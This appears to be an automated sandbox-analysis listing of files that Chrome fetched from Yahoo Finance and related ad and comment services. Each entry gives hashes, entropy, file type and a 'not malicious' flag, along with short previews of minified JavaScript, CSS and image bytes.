                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:/*! For license information please see common-17a0a1b3.37df374c080303b4b67a.js.LICENSE.txt */."use strict";(self.webpackChunk_vzmi_finance_cosaic=self.webpackChunk_vzmi_finance_cosaic||[]).push([[6477],{7083:(e,t,a)=>{var r=a(4603);(e=>{var t=void 0!==r.mE?r.mE:e.CIQ;function a(){}t.ChartEngine||(t.ChartEngine=function(){}),a.fetchInitialData=function(e,t,a,r,i){},a.fetchUpdateData=function(e,t,a,r){},a.fetchPaginationData=function(e,t,a,r,i){},a.subscribe=function(e){},a.unsubscribe=function(e){},t.QuoteFeed=t.QuoteFeed||function(){},t.QuoteFeed.prototype.fetch=function(e,t){this.v2QuoteFeed||console.log("You must implement CIQ.QuoteFeed.[yourfeedname].prototype.fetch()")},t.QuoteFeed.prototype.announceError=function(e,a){e.suppressErrors||a.suppressAlert||e.startDate||e.endDate||a.error&&t.alert("Error fetching quote:"+a.error)},t.QuoteFeed.prototype.multiFetch=function(e,t){return 0===e.length&&t([]),e[0].stx.driver.multiFetch(e,t)},t.QuoteFeed.Subscriptions=function(){this.subscrip
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:Unicode text, UTF-8 text, with very long lines (62403)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):75400
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.420177103917909
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:1536:sVeGNcrk8ZlWwWJfg8f4NX6ziaubyLszh:sVei8Zle7f4NqzxubyLszh
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:DFB78546B48E92756E917FF19A824622
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:399767E4DC5B52C214518BBC1E8AF806693D0EFE
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:98A889CE89AC3C60E0689F51F142E22F9BE01186C47436C62E1735008878F8B0
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:947346DB3DD9A50BE12F7ECA45EB0702F9469B37D290D4B12A4FBB2666D3C1EE587AD4328E693ACE75544FC1F5435B32E83C51F8A49361F8C41E0B40F58B1316
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    URL:https://s.yimg.com/uc/sf/0.1.434/js/safe.min.js
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:/*! SAFEFRAME 0.1.434 . 2024, Yahoo Inc. All rights reserved. */!function(){var t={9466:function(t){var e;(e=void 0===e?{}:e).close={name:"close",height:48,width:48,path:"M37.98 34.827l-9.9-9.9 9.9-9.898c.78-.782.78-2.05 0-2.83-.78-.78-2.047-.78-2.828 0l-9.9 9.9-9.898-9.9c-.78-.78-2.048-.78-2.828 0-.78.78-.78 2.047 0 2.828l9.9 9.9-9.9 9.898c-.78.78-.78 2.047 0 2.828.78.78 2.047.78 2.828 0l9.9-9.9 9.898 9.9c.78.78 2.048.78 2.828 0 .782-.78.782-2.047 0-2.827z"},t.exports&&(t.exports=e.close)},4228:function(t){var e;(e=void 0===e?{}:e)["decline-fill"]={name:"decline-fill",height:48,width:48,path:"M24 1C11.3 1 1 11.3 1 24s10.3 23 23 23 23-10.3 23-23S36.7 1 24 1zm9.8 32.8c-.9.9-2.2.9-3.1 0L24 27l-6.8 6.8c-.9.9-2.2.9-3.1 0s-.9-2.2 0-3.1l6.8-6.8-6.7-6.7c-.9-.9-.9-2.2 0-3.1.9-.9 2.2-.9 3.1 0l6.7 6.7 6.7-6.7c.9-.9 2.2-.9 3.1 0 .9.9.9 2.2 0 3.1l-6.7 6.7 6.7 6.8c.9.9.9 2.3 0 3.1z"},t.exports&&(t.exports=e["decline-fill"])},8586:function(t,e,n){"use strict";var r,o=n(7427),i=n(3215),s=n(3945);fun
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:Unicode text, UTF-8 text, with very long lines (65460)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):705901
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.341400930689144
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:6144:UT3GKmy/0UTqSQfFqhPd8eKDQdxVqYK4UKm2FT13qSQfFqkq7c:UTZm18Pd8jDiE4U4FT14mg
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:84C40C02BF8CF1A6CD1235220D591DC5
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:6678BBA3B598AC8714E5E04C3CC1D826B6BCF3EC
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:DC0F4B867849C1C4E25B97BA3483F1663186D05F9312E5E2803BF5CFF1BDA0A4
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:E1FACC6D1140EC63E4A0581D89CD84AC38BA981F7EAD6A0DE7C50F83B0AB72F1C49C94238F2677DA7D2EDB171173D7A2A47F0AD1AECAEC6129F4BB4168C5533D
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    URL:https://static-cdn.spot.im/production/launcher/tags/v3.23.0/launcher/765-bundle.js
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:/*! For license information please see 765-bundle.js.LICENSE.txt */.(self.webpackChunk_spotim_launcher=self.webpackChunk_spotim_launcher||[]).push([[765],{5537:(e,t,n)=>{self,e.exports=function(){"use strict";var e={n:function(t){var n=t&&t.__esModule?function(){return t.default}:function(){return t};return e.d(n,{a:n}),n},d:function(t,n){for(var r in n)e.o(n,r)&&!e.o(t,r)&&Object.defineProperty(t,r,{enumerable:!0,get:n[r]})},o:function(e,t){return Object.prototype.hasOwnProperty.call(e,t)},r:function(e){"undefined"!=typeof Symbol&&Symbol.toStringTag&&Object.defineProperty(e,Symbol.toStringTag,{value:"Module"}),Object.defineProperty(e,"__esModule",{value:!0})}},t={};return function(e,t,r){r.r(t),r.d(t,{CurrentUserMenu:function(){return ee},LoginButtons:function(){return Q},PrettyDate:function(){return C},ReadingTracker:function(){return ne},defaultTranslations:function(){return m},loadTranslations:function(){return p},translationsNS:function(){return d}});var o=n(87029),a=r.n(o),i=n(80
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (28241)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):28341
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.268980980631253
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:768:k46pTzZFRQBbEoSvt/EhziP0M0o5LaIa8d8C+:szZ1oSvqBnTRIx8
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:BDF5563389F8BE4BFA4016B1C8222F4E
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:7E49D0784173844D6A7A6ECE9C0DC4DC4E3FFA7A
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:AE72534FD8A749E7309C995E5A03461407EE30D211E4E225EEAA875E3E37DD59
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:343CAB9893FBEFCF65F209D34BD5D53F5FBF2CA2D86471D7EBCA24999AE1710E56A05FB085464E6287407320006F48F744C8A5DBEB80FA74B3F56FC54A343B29
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:/* v1.17.0-pre.Updated : 2024-08-30.DEPRECATED, please use creative based on hb_format targeting */.!function(n){var r={};function o(t){var e;return(r[t]||(e=r[t]={i:t,l:!1,exports:{}},n[t].call(e.exports,e,e.exports,o),e.l=!0,e)).exports}o.m=n,o.c=r,o.d=function(t,e,n){o.o(t,e)||Object.defineProperty(t,e,{configurable:!1,enumerable:!0,get:n})},o.n=function(t){var e=t&&t.__esModule?function(){return t.default}:function(){return t};return o.d(e,"a",e),e},o.o=function(t,e){return Object.prototype.hasOwnProperty.call(t,e)},o.p="",o(o.s=3)}([function(t,e,n){"use strict";e.i=function(t,e){var n=new Image;e&&"function"==typeof e&&(n.addEventListener("load",e),n.addEventListener("error",e));n.src=t},e.a=function(t){return t?(t=encodeURI(t),'<div style="position:absolute;left:0px;top:0px;visibility:hidden;"><img src="'.concat(t,'"></div>')):""},e.j=function(t,e,n){n=r.a(n,e);n.src=t,document.body.appendChild(n)},e.g=function(t,e){var n=new XMLHttpRequest;n.addEventListener("load",function(){e(
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:Java source, ASCII text, with very long lines (594)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):595
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.068374723525868
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:12:NjlBmhyycNFso0//9CEeU/D1+j8D1DTsqBu5GncWfohj:Fby2s1/VCY1+j8R3sq8qnfmj
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:7BA731BD45AB9D25C2313738462B84AD
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:6DC04674F295E563629498F98FA9A37AC5451923
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:75026AD8633CC91319941FBDD63224D47B7A4848B7E3121824FC4F4BE5C30AB2
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:FF03E2CEA81DB4F27E0816D5C07AA0F7DD3472CAF024E8A5477F6FCC31F5FE8C5FB0A7BD5DABF53AD15F8E0E825849B96BD05B99F566DE0CA8427F3EA52330D0
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:import{s as l,c as i,u as r,g as u,a as f}from"../chunks/scheduler.Dsuh-FKt.js";import{S as _,i as c,t as p,a as m}from"../chunks/index.CvwOawEI.js";function $(a){let s;const n=a[1].default,e=i(n,a,a[0],null);return{c(){e&&e.c()},l(t){e&&e.l(t)},m(t,o){e&&e.m(t,o),s=!0},p(t,[o]){e&&e.p&&(!s||o&1)&&r(e,n,t,t[0],s?f(n,t[0],o,null):u(t[0]),null)},i(t){s||(p(e,t),s=!0)},o(t){m(e,t),s=!1},d(t){e&&e.d(t)}}}function d(a,s,n){let{$$slots:e={},$$scope:t}=s;return a.$$set=o=>{"$$scope"in o&&n(0,t=o.$$scope)},[t,e]}class S extends _{constructor(s){super(),c(this,s,d,$,l,{})}}export{S as component};.
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (330)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):331
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):4.76176773688465
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:6:A+T+CxvF4KBvN88+LVBCBJDKgddQEeGgX5AuvM8v0A4TB1bw:A+i84KBkVBODKgddQELgXeuvr8A40
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:293CF07BB6B52A1A18D797328200C9C7
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:BF69950A40F5BA11475E896A5EB2F7B049370031
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:8AC7E74D523881BB9FFB193D8897292CD05F78DFA91ECD285411D337361B1FB2
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:996AB8246130832BBF9F7ED8BC24419E34E501DF8D36A34FB16BF0269F90C593B3DA05F0FA96FE2444A0345B32175B4781192BA0FD02A11F33CB2902C44E5A00
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:function r(t,s){const c={},u={},f={$$scope:1};let i=t.length;for(;i--;){const o=t[i],e=s[i];if(e){for(const n in o)n in e||(u[n]=1);for(const n in e)f[n]||(c[n]=e[n],f[n]=1);t[i]=e}else for(const n in o)f[n]=1}for(const o in u)o in c||(c[o]=void 0);return c}function a(t){return typeof t=="object"&&t!==null?t:{}}export{a,r as g};.
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:Java source, ASCII text, with very long lines (3657)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):3658
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.408122321407459
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:96:fZ713XvLCOAFiOr1GQimLbr/aE+1jes88387Sjny2tCsa6YICcfqIHDEXp:BR3eOgiOr1Lb/8387+yECRIjwp
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:263D4876367F5ACDED499553F40B660C
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:C444BB9409CF2C7CC27F3C48109853F3C7FDA1FC
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:1AE9ADD52B9EB4EB87D680E274B75C5AABA13C903BB2C493C68F631179AD7325
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:71ECCD6373AD89624EA88D41A45AEE5A09FFBA57059951C60A205227A9D228B2B8CFABCD1766A12F759822332A59D987A1F23A5ED222E866F2106A39C8AC4DD2
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    URL:https://finance.yahoo.com/assets/_app/immutable/chunks/Button.C2rixdaC.js
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:import{s as P,A as z,e as Q,b as U,d as W,f as Y,j as F,i as S,B as C,L as c,k as H,l as J,G as E,v as K,_ as M,W as R,c as X,u as Z,g as v,a as w,$ as V,Q as p}from"./scheduler.Dsuh-FKt.js";import{S as x,i as $,t as m,g as y,a as b,e as I,c as ee,b as ie,m as ne,d as le}from"./index.CvwOawEI.js";import{g as te}from"./spread.CgU5AtxT.js";import{I as ae}from"./Icon.C8w5V9EK.js";import{g as T}from"./i13nUtil.8E8_gCdn.js";function j(l){let e,a;return e=new ae({props:{size:l[7]||l[6],icon:l[5],type:l[8],className:l[11]}}),{c(){ee(e.$$.fragment)},l(i){ie(e.$$.fragment,i)},m(i,s){ne(e,i,s),a=!0},p(i,s){const u={};s&192&&(u.size=i[7]||i[6]),s&32&&(u.icon=i[5]),s&256&&(u.type=i[8]),s&2048&&(u.className=i[11]),e.$set(u)},i(i){a||(m(e.$$.fragment,i),a=!0)},o(i){b(e.$$.fragment,i),a=!1},d(i){le(e,i)}}}function q(l){let e;const a=l[14].default,i=X(a,l,l[13],null);return{c(){i&&i.c()},l(s){i&&i.l(s)},m(s,u){i&&i.m(s,u),e=!0},p(s,u){i&&i.p&&(!e||u&8192)&&Z(i,a,s,s[13],e?w(a,s[13],u,null):v(s[13]),nu
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:Java source, ASCII text, with very long lines (2820)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):2821
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.445615695759054
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:48:IAO9qd6fBd571ikI0RoB3yPivwpnjZ287E4PiiTY5ekWdRhBOGqAf9J3e4e4PueY:IAO9c65r71SBBCRhjJ7E4RY5uTGG7l0x
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:98F6F724D006F0EF976223B679E04659
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:EE85633C42A01B638FA6FDEDDA035C2CCE5DED20
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:1D65D5CDE85C70282FC0A906C75BA60684FFEE5450DE3F1F4A53D1FC68D06B40
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:2C39E467662113B30E9BCF9A2FFF7201F6A94E13729098C50325E9C08B02D71701836B55A3A8AA80C7AECDDB413162FDBC1F17024EBFDAE17F2C056C744C0E97
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:import{s as F,A as _,e as S,t as G,b as O,d as y,f as T,h as U,j as W,i as C,B as R,R as D,L as f,q as k,O as M,k as H,l as B,G as N,m as J,n as L,v as K,_ as q,W as Q}from"./scheduler.Dsuh-FKt.js";import{g as V}from"./spread.CgU5AtxT.js";import{S as X,i as Y}from"./index.CvwOawEI.js";import{b as Z}from"./i13nUtil.8E8_gCdn.js";function v(t){let e,i,o,s,d,h,c,u,m=[{type:"checkbox"},{role:"switch"},{class:"switch-inpt"},{id:d=`switch-${t[9]}`},t[11]],b={};for(let a=0;a<m.length;a+=1)b=_(b,m[a]);return{c(){e=S("label"),i=G(t[4]),o=O(),s=S("input"),this.h()},l(a){e=y(a,"LABEL",{for:!0,class:!0});var n=T(e);i=U(n,t[4]),o=W(n),s=y(n,"INPUT",{type:!0,role:!0,class:!0,id:!0}),n.forEach(C),this.h()},h(){R(s,b),(t[0]===void 0||t[1]===void 0)&&D(()=>t[14].call(s)),f(s,"yf-xyblh0",!0),k(e,"for",`switch-${t[9]}`),k(e,"class",h=M(`switch-label sz-${t[3]} label-${t[5]} ${t[2]}`)+" yf-xyblh0"),f(e,"labelRight",t[8]),f(e,"labelBold",t[6]),f(e,"spaceBetween",t[7])},m(a,n){H(a,e,n),B(e,i),B(e,o),B(e,s),s
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:RIFF (little-endian) data, Web/P image, VP8 encoding, 300x156, Scaling: [none]x[none], YUV color, decoders should clamp
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):8896
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):7.976158955359019
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:192:ZXKMIqQikMD8MlD2qX2uHP8akJZucdH2ypIzHem:ZLIvMgM92m246ZBwyp6D
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:B757E8534BF59C57411E4DC5EE72E219
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:6977BFAC860C9E96B0E2BB47CE5E0FB142C209BD
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:6469E245BDC9015DD8D05AF65A7DFBD02458A9E5B27A596315E3F9C23C5AF5AA
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:341EA3E41956D46A643A708FA9875CA9B0D54E941B3073E6F7617C793F9D06FA469AE1E86B312B29E4B578DAEAA197E5669DFD43B0E82E2BB78EE3DEA797F464
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    URL:https://s.yimg.com/uu/api/res/1.2/1IAUDYdOSONDSm2DkprmEA--~B/Zmk9c3RyaW07aD0xNTY7dz0zMDA7YXBwaWQ9eXRhY2h5b24-/https://s.yimg.com/os/creatr-uploaded-images/2024-09/7d21b410-7f40-11ef-b77e-dea3714d1b2e.cf.webp
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:RIFF."..WEBPVP8 ."...z...*,...>y2.G$..!,6=0...d..rn..~..B...{......;..=W.\.I.......G.o./Z..}J..u@..yv~..>.x..n..O.._.......?..M~m........../.-E=...m}.=..../.y..C.....k.O.~+..........f........Q.%.T..T)v<...d ....H..1e.~mB....a...3.....AT....6%U\E.....dly...pVq...|"....yg"..s.mB...=....O.F._..'7r.._R...|...M...J..&..RV........a.1wD..j...........v._Y....g*...N.(ZCe@7v.yb=....,"F...S3......#..Km..-\..3.W.....3.w...K..M..J.n......R....ua......H0Z,.@T\.k..I...X...$.........N....X.y.cB/.,87z.+......{.7...Q...;2G.^>..Wuo........}....K..0./...,G_.J1Zew..I.......'"..Ki."..N..Z....*ER..1D...G.{.0.... ....:./o..NCb.A...w7ZLE..K"..B....c.Kt..Q.J{..u.O.S.....K.`........v.m....w^..I..]....k.PS.../...Cm.J..?ur.......u{3.,b..A.}..J..9.}..~J....{=.7.nne,O)..m..6a......O......0.B..%......hP.c......z.K.x....-b.Y9.g..5.LP..l.g{.|).....=...O...D.e.V.....2..R.9;.xn~..r.[...UB$...pZ.?r.........*.u....N..oN-.<[...i0.^....z.-......@dl...i..c...%....._!.K...rX.16
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:Unicode text, UTF-8 text, with very long lines (63659)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):101962
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.260395010789332
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:1536:s7cBfQ7YvwTWoAy3I2Mq2S0pH/rqGIk0oL0y1GjKeXlBEYkF/UGdp7SxbOintxHG:HxpH/rqboLlGWtx8lXK
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:B6BD4DC883BAF9005286FCF60AA6E68A
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:88BAC358912B0334DA75149D179BA3AE1C2732A8
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:BF0B4180476F635617EAC65EC538ACA10C836D87F9B4B0853210FCF958EFD11F
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:EB52EB1103079A20EAC9863ABBBAD0B941B73B3EE1C61981A4D22AEE2F82FFF4774E2BB236AD32B9DF3663FEE0A0A421E35BB04C5F1709FA4DE26F6E6082DC86
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:(function(){window.__OW_CONFIG__={"ab_test_config":[{"short_name":"100","version":"v2"},{"short_name":"101","version":"v2"},{"short_name":"32","version":"v1"},{"short_name":"33","version":"v2"},{"short_name":"34","version":"v2"},{"short_name":"35","version":"v1"},{"short_name":"37","version":"v1"},{"short_name":"46","version":"v2"},{"short_name":"47","version":"v1"},{"short_name":"48","version":"v1"},{"short_name":"51","version":"v1"},{"short_name":"55","version":"v1"},{"short_name":"56","version":"v1"},{"short_name":"600","version":"v1"},{"short_name":"601","version":"v2"},{"short_name":"602","version":"v1"},{"short_name":"67","version":"v2"},{"short_name":"751","version":"v1"},{"short_name":"752","version":"v1"},{"short_name":"754","version":"v2"},{"short_name":"758","version":"v33"},{"short_name":"759","version":"v11"},{"short_name":"761","version":"v8"},{"short_name":"764","version":"v1"},{"short_name":"767","version":"v1"},{"short_name":"773","version":"v1"},{"short_name":"776","v
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (1065)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):1066
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):4.879445806441916
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:24:nidA4UMi6kIFG/V1WTzRwwBKdGIGIXLQn3d:ni+b6DFCGugt
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:A9C6B1A9A2807F9D43DFC24578384985
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:1B91AB831B3DFA3AAE25763291FD4D0F73A1D17D
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:1E613245FF45EF5AB334B50FEB16025DC10F5527671226FF0BCB68AC2AD619FE
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:CCD1F1509195E290AA6D5B539C31CDAACAABD4F00A5D00E5279FB3E128219F7622B0762061132A9230CE06A56F08E9A284FC6775F6223CA1EECDB8A529F2DD5A
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    URL:https://finance.yahoo.com/assets/_app/immutable/assets/Footer.BvGH1Mdb.css
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:.footer.yf-1ssmcoe.yf-1ssmcoe{padding:4.5rem 1.5rem 2.5rem;background-color:var(--surface3);color:var(--primary);container-type:inline-size;font-size:var(--font-s)}.wrapper.yf-1ssmcoe.yf-1ssmcoe{display:flex;gap:var(--space-8);flex-direction:column}.logo-and-social.yf-1ssmcoe.yf-1ssmcoe,.trending.yf-1ssmcoe.yf-1ssmcoe,.explore-more.yf-1ssmcoe.yf-1ssmcoe,.about.yf-1ssmcoe.yf-1ssmcoe{display:flex;flex-direction:column;gap:var(--space-1);align-items:flex-start;width:-moz-fit-content;width:fit-content}.colHeading.yf-1ssmcoe.yf-1ssmcoe{font-weight:var(--font-bold)}.social-links.yf-1ssmcoe.yf-1ssmcoe{padding-top:1.625rem;display:flex;gap:var(--space-4)}.logo-and-social.yf-1ssmcoe.yf-1ssmcoe{max-width:190px;order:1}.copyright-wrapper.yf-1ssmcoe.yf-1ssmcoe{max-width:150px}.privacy-icon.yf-1ssmcoe.yf-1ssmcoe{max-width:40px}@container (width >= 560px){.footer.yf-1ssmcoe .wrapper.yf-1ssmcoe{flex-direction:row}.logo-and-social.yf-1ssmcoe.yf-1ssmcoe{order:0}}@media screen and (min-width: 1280px){.l
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (17353)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):17354
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.502748004372787
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:384:tN1B37/TjdXlsiREgZw/lLDmH3tF2cv0wLVseobi4OLe1K2crD:Pr/TjPs8ESwRmH3tF2cv0wLV5obi4OL7
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:2C15C9BC9B0DEACC73B1F71DE7067474
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:AC32624CF4452DA67B9C16BEE9E47098C2F72E23
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:E1086488781353234BA308A490CEC38D2C822397C7B13068BBA3669F514BF1C7
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:22163C74F1AE3E03914FEE610E3FBB3104EF25F27D93A220F125063B50DE2D625802A66A639A32F1234216656B2D09FFE7022F87C0FF45103DAF1046B493E2EE
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
